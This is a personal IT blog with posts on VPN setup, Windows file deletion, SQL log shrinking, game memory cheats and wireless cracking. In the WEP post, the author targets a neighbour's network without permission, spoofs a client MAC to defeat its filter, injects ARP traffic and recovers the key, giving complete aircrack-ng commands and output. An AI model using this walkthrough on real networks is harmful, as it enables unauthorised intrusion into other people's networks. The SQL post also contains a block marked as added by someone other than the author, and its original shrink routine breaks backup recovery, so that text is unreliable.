IPSec VPN with Netgear FVS318v3

My Belkin N1 Vision router decided to die the other day. So I realized it was time for an industrial strength router. Checked out a really nice one with Linux built in and great application support. It was a little pricey for me right now, just got a new girlfriend and moved in with her... 🙂

I finally decided on the Netgear FVS318v3, which comes with a built-in IPSec VPN server for 8 concurrent connections. Netgear wants ~$50 for the client software, which I wasn't really happy about paying. So I started checking around for a free alternative. Finally I came across Shrew Soft VPN Client (http://www.shrew.net/). It's free and really lightweight. It took some figuring out how to configure it all, so I thought it was a good idea to share it.

I presume that you already have DynDNS enabled. If you have a dynamic WAN address it’s a must to get this to work.

First you have to set up your FVS318 router to accept the connections.

  1. Log on to your router and go to the “VPN Wizard” in the left hand menu.
  2. Just click “Next”…
  3. You have to set a name for your connection and a pre-shared key (PSK). Select “A remote VPN client” as connection type.
  4. You will get a confirmation screen next. Just click “Done”.

Now your router is up to speed and you need to download the VPN client from http://www.shrew.net/download
Once installed it's time to set up your new connection.

  1. In the router admin page select “IKE Policies” in the left hand menu. The two pieces of information you are interested in are “Local ID” and “Remote ID”.
  2. Now start Shrew Soft VPN Access Manager and click “Add”.
  3. Now enter your DynDNS, or static WAN address if you have one, in the “Host Name or IP Address” field.
  4. Set “Auto Configuration” to “disabled”.
  5. Set “Local Host” – “Address Method” to “Use an existing adapter and current address”.
  6. Now go to the “Name Resolution” tab. If you know the addresses of the WINS server and/or DNS server on the remote network, enter them here. If not, uncheck the check boxes.
  7. Now go to the “Authentication” tab and set “Authentication Method” to “Mutual PSK”.
  8. “Local Identity” should be the field “Remote ID” on the router's “IKE Policies” page. “Identification Type” should be “Fully Qualified Domain Name”.
  9. On the “Remote Identity” tab the “Identification Type” should be “Fully Qualified Domain Name” and “FQDN String” should be the “Local ID” from the router's “IKE Policies” page.
  10. Moving on to the “Credentials” tab fill in your PSK in the “Pre Shared Key” field. In this case “areallylamekey”.
  11. Then go to the main tab “Policy”.
  12. Uncheck the “Obtain Topology Automatically or Tunnel All” check box.
  13. Click the “Add” button.
  14. Type in your network. To route all the 192.168.0.x addresses over the VPN tunnel, enter address 192.168.0.0 and netmask 255.255.255.0. If you have the same network address range at home and in your current location, you can enter specific addresses or add another topology entry that excludes those addresses.
  15. Then hit “Save” and you will return to the main window.
  16. Double-click your connection and select “Connect”. That's it!

You're now up and running with your own secure IPSec tunnel to your home or office!

Unable to display current owner

Ran across a strange problem today. On a test server running Microsoft Windows Server 2008 one developer discovered that he couldn't delete a file even though he was admin on the system. I connected to the system and realized that I had the same problem, even though I'm domain admin. When I checked the permissions on the file it just displayed that I didn't have the permissions to see the ACL and redirected me to the ownership tab. All I could see there was “Unable to display owner”. When I tried to take ownership I got “Access denied” again. So back to the trusted CMD, I thought! Same thing: cacls.exe returned the same and gave me Access denied...

I then ran psexec from Sysinternals: psexec -s cmd.exe
This starts the CMD as the local system account. Now I have access to anything, or so I thought. NOT!
Same thing again, couldn't do anything with the file or view any options. Back to the drawing board, and then I came up with a reboot. Tried it and failed; it was a desperate measure and it was pretty clear that it wouldn't fix anything.

Then I found the solution: I needed to access the file without Windows pounding the NTFS rights in my head. I really didn't want to rip out the hard drive and put it into another server to do it. So this is what I did...

Download MoveFile from Sysinternals.
Run cmd.exe as administrator.
Run movefile c:\{path}\{fucked-up-file} ""
Reboot

That will trigger the operating system to delete the file during system boot.

SQL transaction logs growing and growing and …

Growing transaction logs on SQL servers are a common problem, but many admins don't think twice about it; they just add more disk space. The transaction log is only needed when you want to restore to another point than the last backup, so in many cases it is not needed right after a backup. Or you take a backup of it and then free up the space on your RAID 10 disks, which are more expensive than your backup media. To free up all the space used you need to set the database to the simple recovery model and then do a shrink on the DB. When that is done you place the DB back in the FULL recovery model. So why not do this automatically once a week right after the backup?

Just add a T-SQL task to your maintenance plan and run the code below:

[sql]EXEC sp_MSForEachDB
'IF ''?'' NOT IN (''master'', ''tempdb'', ''model'', ''msdb'')
BEGIN
    ALTER DATABASE [?] SET RECOVERY SIMPLE;
    DBCC SHRINKDATABASE ([?], 10, TRUNCATEONLY);
    ALTER DATABASE [?] SET RECOVERY FULL;
END'[/sql]

Or, if you want to build a custom list of databases so you don't run this on all of them, run this code to generate the T-SQL:

[sql]EXEC sp_MSForEachDB
'IF ''?'' NOT IN (''master'', ''tempdb'', ''model'', ''msdb'')
BEGIN
    PRINT ''ALTER DATABASE [?] SET RECOVERY SIMPLE;'';
    PRINT ''GO'';
    PRINT ''DBCC SHRINKDATABASE ([?], 10, TRUNCATEONLY);'';
    PRINT ''GO'';
    PRINT ''ALTER DATABASE [?] SET RECOVERY FULL;'';
    PRINT ''GO'';
END'[/sql]

The important thing is to set TRUNCATEONLY; if you don't, you will fragment the entire DB file. When you run the command above without the TRUNCATEONLY parameter it will take the last record in the DB file and place it in the first hole of empty space in the DB file, and so on, so you will create fragmentation if you do so.
Another way to do it, which is slower and creates more disk IO but can be done, is to do a transaction log backup and then just delete the transaction log backup file.
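The same weekly cycle as a stand-alone T-SQL script, added here as an example and not part of the original post: it runs only against user databases that are actually in the FULL recovery model, records the log file size before the shrink, and takes a full backup after switching back, since the switch to SIMPLE breaks the log backup chain and log backups fail until a full backup starts a new one. It assumes SQL Server 2005 or later and a backup folder D:\Backup\, which is a placeholder.

```sql
-- Added example (not from the original post): weekly log cleanup for user
-- databases in FULL recovery, followed by a full backup to restart the log
-- backup chain. D:\Backup\ is a placeholder path, change it to your own.
SET NOCOUNT ON;

DECLARE @db   sysname;
DECLARE @sql  nvarchar(max);
DECLARE @file nvarchar(260);
DECLARE @path nvarchar(260);
SET @path = N'D:\Backup\';

-- Only user databases (database_id > 4 skips master, tempdb, model and msdb)
-- that are online, writable and really in FULL recovery. tempdb cannot be set
-- to FULL at all, which is why a blanket sp_MSForEachDB version errors on it.
DECLARE db_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT name
    FROM sys.databases
    WHERE database_id > 4
      AND recovery_model_desc = N'FULL'
      AND state_desc = N'ONLINE'
      AND is_read_only = 0;

OPEN db_cur;
FETCH NEXT FROM db_cur INTO @db;

WHILE @@FETCH_STATUS = 0
BEGIN
    -- Log file size before the shrink (size is in 8 KB pages) so the effect
    -- of the job shows up in the maintenance plan history.
    SELECT @db AS database_name, name AS log_file, size * 8 / 1024 AS size_mb
    FROM sys.master_files
    WHERE database_id = DB_ID(@db) AND type_desc = N'LOG';

    SET @file = @path + @db + N'_after_shrink.bak';

    -- Same three steps as the post. TRUNCATEONLY only releases free space at
    -- the end of the files and moves no pages, so nothing gets fragmented;
    -- the 10 (target percent) is ignored when TRUNCATEONLY is given.
    SET @sql = N'ALTER DATABASE ' + QUOTENAME(@db) + N' SET RECOVERY SIMPLE; '
             + N'DBCC SHRINKDATABASE (' + QUOTENAME(@db) + N', 10, TRUNCATEONLY); '
             + N'ALTER DATABASE ' + QUOTENAME(@db) + N' SET RECOVERY FULL; '
             -- Switching back to FULL does not restart the log chain; the
             -- full backup does. WITH INIT overwrites last week's file.
             + N'BACKUP DATABASE ' + QUOTENAME(@db) + N' TO DISK = @file WITH INIT;';

    EXEC sys.sp_executesql @sql, N'@file nvarchar(260)', @file = @file;

    FETCH NEXT FROM db_cur INTO @db;
END

CLOSE db_cur;
DEALLOCATE db_cur;
```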

MS documentation: http://msdn.microsoft.com/en-us/library/ms190488.aspx

IIS 7 FTP access denied while uploading files

I got this strange problem yesterday at work. One of our developers was trying to upload files to a new server and he got 500 access denied each time he tried. After he spent hours double-checking all the NTFS rights and IIS settings he asked me for help. At first look I thought the IIS server had been messed up somehow. After verifying that everything he told me was OK (after all, he is a coder and they usually don't understand servers), I really didn't know what to do next. So I thought about it for a moment and then I started from scratch and checked the entire solution from the bigger picture.

So with the system blueprint in front of me it all started to clear up. The server was situated in our server center across town and all his traffic was passing through a VPN tunnel between our two ISA 2006 servers. The ISA server sets all the FTP rules to “Read-Only” by default, but I didn't realise that this was a problem for the VPN site-to-site tunnel as well. After checking the routing rule and then the access rule for the communication between the two networks I found the settings for FTP traffic between the two ISA servers. After I unchecked the “Read-Only” check box for the FTP traffic on the VPN site-to-site access rule it all worked as designed.

World Domination II Hack

I was trying to pass the time the other night while waiting on a very slow crypto crack. On one of my servers I found the old flash game World Domination II. First I played it over and over again but then I wanted the edge. Like when the US goes to war with superior technology, money and control over the media. First I googled it to see if someone had already done the work for me, just like you did when you found this. I actually found a hacked version online with limitless cash and less cash for the opponents. But I wanted more. So you can start out by testing the online hacked version and then follow the tutorial below.

World Domination 2 (full) – Hacked
Easy: $999999,000,000
Medium: $999999,000,000
Hard: $999999,000,000
Enemies money is lowered to $50.000.000
T…..
www.arcadeprehacks.com

http://www.arcadeprehacks.com/game/413/World-Domination-2-(full).html

First get Cheat Engine: http://www.cheatengine.org/downloads.php
Install it and start it!

In the top left corner there is a computer icon, click it.
You will see a list of processes that you can “hook” on to.
If you're running the game online, “hook” on to your browser process (iexplore or firefox), or WDII.exe if you're running the downloaded version.

Now start the game and select your opponents and level and start.
I selected hard so I have $55.000.000 in cash. So I take 55 * 8 = 440.
Switch to Cheat Engine, put 440 in the value box and hit First Scan.

You will get a number of hits that we can sort through later. Now return to the game and either gain money through Resources or spend money somehow.

I selected Resources and gained some cash. Now I'm up to $86.000.000. So I take 86 * 8 = 688.
Go back to Cheat Engine, put that in the value box and hit Next Scan.
You will be left with two results; double-click them both, change them to something like 8000 and then freeze them. You have to change both of them, otherwise you can't spend any money and just look at a pretty number on the dashboard.

Before you do anything else go back to the game and hit the Propaganda button, select a city and check your Propaganda strength. Mine was 71%, so 71 * 8 = 568.
Take that and put it in the value field of Cheat Engine and hit New Scan and then First Scan.

Again a large number of hits, so do something to change your Propaganda Strength in the game.
My new strength was 87%. So 87 *8 = 696. Put that in the value field and hit Next Scan.
Double-click the value, change it to 800 and freeze it and you will have 100% propaganda forever.

You can change all the other values of the game, like number of warheads and stuff like that, but that will really take all the fun out of the game. Now you can build whatever you want and start diplomatic relations with whoever you want.

WEP Cracking with Fon (Fonera) router

I usually use my Fon router when doing the collection work for wlan cracking. I recently moved to a new apartment in my hometown and this is what I call a target rich environment! 15 wlans with good power right at my desktop. That is just too good to be true! So here is a little rundown on how to do this easily. This guide can also be used for any other hardware but it has some special info just for the Fonera.

Here is a guide to cracking your Fonera router:
http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a Linux computer for your pocket, much like your iPhone if you have one. The big difference is that this Linux pocket computer is great for wlan use. First start an SSH session to the router and log in.

We need to set up the wlan card for our use. If you're connected via the “Legend” wlan you have to keep that. I prefer to connect via cable to the router and then destroy the “Legend” network before I begin (wlanconfig ath0 destroy). But even if you destroy that you can run the rest of the guide with ath1.

So lets begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

[ps]wlanconfig ath1 create wlandev wifi0 wlanmode monitor[/ps]

Then we want a list of networks around us that we can attack. With airodump-ng without any parameters we can get a list of wlans available for us.

[ps]airodump-ng ath1[/ps]

The router responds with a list of networks and information about encryption, and you can also see a list of clients that the card picks up.
In the list below no clients are seen but they usually show up; this is just a quick scan I did to show the principle. When you have your list just hit CTRL + C to get back to the prompt.

[ps]CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes[/ps]

My unlucky neighbor who has chosen to call his/her wlan MAD will be today's target. I selected this because it's MAC controlled. If the correct MAC isn't in the router's “Allowed list” or “White list” I will be unable to connect. To be able to handle the amount of data that I need to collect to crack the WEP key I need to connect a share to the FON router. In this case I will connect the FON to a share I put up on my Windows 7 box. First you need to create an account on your Windows box that doesn't have spaces in it and select a password for that account. Then share a folder and give read/write access to that account. Then mount it onto your FON router.

In the /mnt folder run the command:

[ps]mkdir share[/ps]

Then mount the share to that folder like this:

[ps]mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME> -o username=<USERNAME>,password=<PASSWORD> /mnt/share[/ps]

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

[ps]airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

So what have we done now? We provided airodump-ng with some important information:

[ps]-c 3[/ps]

We told it to listen to channel 3 only. If we omit this parameter it will hop up and down the channels.

[ps]--bssid 00:18:4D:8C:52:0E[/ps]

We supplied the MAC address of the wlan base so it knows what to listen for.

[ps]-w /mnt/share/MAD[/ps]

-w stands for “write”: we want airodump-ng to dump the information into the file MAD on the Windows box share.

[ps]ath1[/ps]

What wlan instance to use.

The router will also show us the information in real time while it collects the IVs (initial vectors) that we need for the crack.

[ps]CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5[/ps]

Now you can see the client that is connected as well. When I started attacking this network I didn't know it had a MAC filter running, but I found out pretty quickly when I couldn't associate with it or authenticate with it. If you can't do an association like the one below, or if packet injection fails (it's not sending any packets), you are probably talking to a MAC filtered router. So how do we solve this issue? We fake our MAC!

If you have no problem associating with the station like below you can skip this step.

[ps]aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful :-)[/ps]

So what did I try here? I did a “Fake Authentication” against the router to see if it allows me to connect. Please note that the -h (my client MAC) is the same as the client I found earlier.
In this screenshot I have already faked my MAC to be able to connect to the router. I didn't save any screenshot of the failure. A quick rundown of the command above:

[ps]-1[/ps]

Fake Authentication attack

[ps]0[/ps]

How often to send an Authentication/Association Request (depending on the router you will be dropped after a while and need to re-authenticate)

[ps]-e "MAD"[/ps]

The SSID of the router.

[ps]-a  00:18:4D:8C:52:0E[/ps]

The MAC address of the router.

[ps]-h  00:22:43:6E:BD:F5[/ps]

The MAC address of the client. In this case a spoofed one to get around the MAC filter, but in all other cases you can use your original MAC or just 1:2:3:4:5:6

[ps]ath1[/ps]

The wlan instance to use.

So this raises two questions. First how do you get your MAC?

[ps]ifconfig[/ps]

This command will show you all the info on all the network devices you have and you can extract the MAC address of the wifi0 in this case.
Second question: how do I spoof my MAC?

[ps]ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up
[/ps]

Now we have changed the MAC address of the card to what we want/need. In some cases it can give you an error like “Device Not Ready”.
Just try to destroy all the athX instances before you take the wifi0 off-line and you will probably succeed.

Now we can access the network to do our thing so let’s get to it. If you had to destroy ath1 when you reset your MAC then just create it again as we did before.
Then start the airodump-ng with the file write option again:

[ps]airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

Then start a second SSH client and connect to the FON and log in again. Now we will help the process along big time! The data column in the scan result (first window/session) needs to go up to 250.000 for us to be able to crack a 128bit key and over 800.000 for heavier keys. You can collect all that data by just listening to the traffic but it will take days or even weeks. We can do it much quicker ourselves. In the second window/session we will start a packet injection attack of the ARP kind. In short, ARP is a way for network gear to keep track of which device has which IP address and MAC address combination. Every time we send an ARP request the router will respond with a new IV (initial vector), and that's what we count as data and then use to crack the key. So let's get the IVs coming!

[ps]aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1[/ps]

This will start sending packets in large numbers. The FON can send about 40-50 packets per second. Thanks to the fact that we changed our MAC we will now get our traffic through. If you see the “packets sent” counter stopping, that usually just means that you lost your association with the router. Just hit CTRL + C and run the “Fake Authentication” attack again. If this happens over and over again set the -1 0 to something like -1 20 and it will re-associate every 20 seconds. If you need to do that just open a third window/session so you can have it all running at once.

Once we have collected enough IVs we can start cracking. I usually start the cracking process on the file before the collection is done. If you do so it will start the process and, if no key is found, restart the crack every 5.000 IVs collected. However, this is not a job for the FON due to its limited processing power. I usually use my Linux box or my Windows box where I have more computing power. The Windows box is easy, there is a GUI, so if you made it this far you will be able to figure that out. The command line to do this is:

[ps]aircrack-ng c:tempfoneramad_mac-01.cap[/ps]

The result will be something like this:

[ps]Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%[/ps]

As you can see I only needed a little over 170.000 IVs to do this, and when the crack was successful I could stop the attack on the network.
So now we have the key:

[ps]04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A[/ps]

People who get this far still ask me a question, “How do I use that key from windows?”
The router accepts both ASCII phrases and hex keys like the one above. Just remove the : from the key and Windows will be able to connect to the network.

Youtube to MP3

I have tested a lot of the programs available to do this. A friend of mine needed a lot of, let's say not mainstream, music for a party. This webpage is the best tool I have tried for this!

http://www.video2mp3.net/

Exchange 2007 ActiveSync screen lock issue with iPhone

A while ago I updated an Exchange Server 2007 with the latest service pack for a client. The SP automatically added a new Exchange ActiveSync Mailbox Policy that required the connected devices to be password protected when the screen went dark. It’s a good idea for many security reasons but the users didn’t like it at all, and the customer is always right. Changed the default policy so password wasn’t required anymore and all was good… for a while.

Then the iPhone users started complaining that their auto-lock setting was restricted: they could select 1 to 5 minutes but the alternative “Never” was gone. This setting, when a password isn't configured, just turns the screen black after a few minutes of inactivity. Again I thought that would be a good thing for many reasons. The iPhone uses enough battery as it is. As always, if you can't have it you need it, want it and must have it. So I reviewed the settings again. There was a setting called “Time without user input before password must be re-entered (in minutes)” that was set to 15 minutes but it was grayed out. After testing a lot of things I finally executed a PowerShell command to solve the issue. Then I noticed that the grayed out option had changed to 0 minutes. So I tested just checking the “Require password” check box, bringing all the grayed out options back, setting the timeout to 5 minutes, unchecking the “Require password” option, again graying out the setting I just changed, then apply. Then the “Never” option disappeared from the iPhone again. So MS did it again, messed up the GUI; a grayed out option shouldn't affect anything.
Thank god for PowerShell so you can get down with the software properly!

Hope the pictures give you a clear picture of what I mean. If you have any questions hit me with a comment and I will try to answer your questions.

SAS Zombie Assault Cheat / Hack

Today I will give you a simple guide to cheating on flash games with the help of Cheat Engine version 5.5. The flash game of choice today is SAS 2: Zombie Assault. It doesn't really matter what flash game we are talking about, the concept is the same! I did find a way to get more money but I couldn't find the location of the money counter to update it directly. If anyone has some input on that I would really like to hear it!

So let’s get to work! First start the game, from your favorite supplier or here: http://www.ninjakiwi.com/Games/Action/Play/SAS-Zombie-Assault-2.html

Then start Cheat Engine. If you don’t have it get it here: http://www.cheatengine.org/downloads.php

Next up is to attach Cheat Engine to the browser process. Click the computer icon in the top left corner of Cheat Engine to bring up the process list. Then look for your browser and attach to it. Now we need some values to search for. Start the game and look at what values you have and what you would like to change.

We have our ammo counter at the lower left corner, we have the cash. In other games you may have other things you would like to change.

Lets start with the ammo counter for the pistol (this will work for any other gun you get later in the game, even sentry guns).

1. Type the number of bullets you have left in your gun into the “Value” field of Cheat Engine and then hit “First Scan”.
2. When the scan has finished you will have a bunch of results; I got almost 200000 results. We can't change all of them hoping for the best, so we need to dig deeper.
3. Go back to the game and waste some more ammo.
4. Take the new ammo count, put it into the “Value” field of Cheat Engine and hit “Next Scan”.
5. If you now have only one result you've been lucky. If not, repeat steps 3 and 4 until you only have one result in the list.
6. Now double click the result, it will pop up in the list at the bottom of the screen.
7. Check the box “Frozen” for the value and that gun will never run out of bullets.

You can do exactly the same with the grenades but you still have to get some first. With the sentry guns it's the same, but you're not in control of the firing, so wait till the gun is not shooting and then search for its ammo count.

Now we get to the money. As I wrote earlier I was unable to find the money variable in memory, but I didn't put much time into it either. There is however one way to get more money: the wave bonuses. When you complete a wave you always get a bonus. On the higher waves it's $500. To get more money do this:

1. Search for the number of the current wave.
2. Wait for the next wave, when the wave indicator has changed “Next Scan” for the new value.
3. Repeat 1 and 2 until you have only 2 results left.
4. Get them down in the list and freeze them.
5. Change them to a wave that gives good money but isn't too hard with your current gear.
6. Complete the wave and get the bonus, the bonus will be repeated over and over again until you unfreeze the values.

Hope this has been helpful for you all.

Must declare the scalar variable @ID

Was just burning the midnight oil on a project for a client. Working with ASP.NET for the first time in ages. Making a quick fix, adding a new form for editing customer details, I used the SqlDataSource control. Usually I work with the SqlCommand in SqlDataClient directly, but now I needed paging and sorting fixed quick and easy! I had a really big problem with the select command parameters. When you use them with the SqlCommand you declare them with an @ prefix in the select command like this:

[sql]Select * FROM Customers WHERE CustomersID = @ID [/sql]

(SELECT * is a sin, I know!)

Then declare the variable as: SqlCommand.Parameters.Add(new SqlParameter("@ID", SqlDbType.Int))
I received errors like “Must declare the scalar variable @ID” and so on. Checked, double-checked and triple-checked... The variable was defined!
But no! Some idiot at MS decided to think outside of the box and the declaration for the SqlDataSource control should be without the @!

Not:

[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
<SelectParameters>
<asp:Parameter Name="@ID" Direction="Input" />
</SelectParameters>
</asp:SqlDataSource>[/vbnet]

But instead this:

[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
<SelectParameters>
<asp:Parameter Name="ID" Direction="Input" />
</SelectParameters>
</asp:SqlDataSource>[/vbnet]